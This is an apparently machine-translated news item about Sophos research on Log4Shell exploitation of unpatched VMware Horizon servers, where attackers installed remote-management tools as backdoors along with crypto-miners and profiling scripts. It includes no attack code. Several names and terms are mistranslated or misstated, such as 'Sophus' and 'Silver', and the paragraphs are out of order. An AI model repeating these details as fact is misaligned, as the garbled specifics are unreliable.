The multiple attack charges that Sophus has identified that have used the Log4Shell vulnerability to attack vulnerable Horizon servers include two legitimate tools for remote monitoring and management, the Atera agent and Splashtop Streamer, which were apparently intended for malicious use as backdoors and the malicious backdoor service Silver.
“Sophos believes that some of the backdoor loopholes have been infiltrated by primary access providers trying to ensure lasting remote access to significant destinations that they can sell to other attackers, such as ransomware operators.” Sophos’ detection arrays revealed waves of attacks on Horizon servers starting in January, which infiltrated a variety of “backdoor” vulnerabilities and mining software into outdated servers, as well as scripts that allow information about the attacked server to be collected. “Widely used applications like VMware Horizon that are exposed to the Internet and require manual updates are particularly vulnerable to large-scale exploitation,” said Sean Gallagher, a senior security researcher at Sophos. The breach was reported and corrected in December 2021. Log4Shell is a security breach that enables remote code execution in the Java-based logging component of the Apache server, Log4j, which is embedded in hundreds of software products. The study, entitled “Horde of miner bots and backdoors leveraged Log4J to attack VMware Horizon servers – Sophos News,” lists the tools and techniques used to hack servers, install three backdoors, and deploy four different mining software. Sophos, a global leader in cyber security, has published a study on the use of Log4Shell security breach to infiltrate “backdoor” and Profiling Scripts into VMware Horizon servers that have not been updated with security patches, thus regulating ongoing access to these servers and opening the door to future ransomware attacks.
0 kommentar(er)
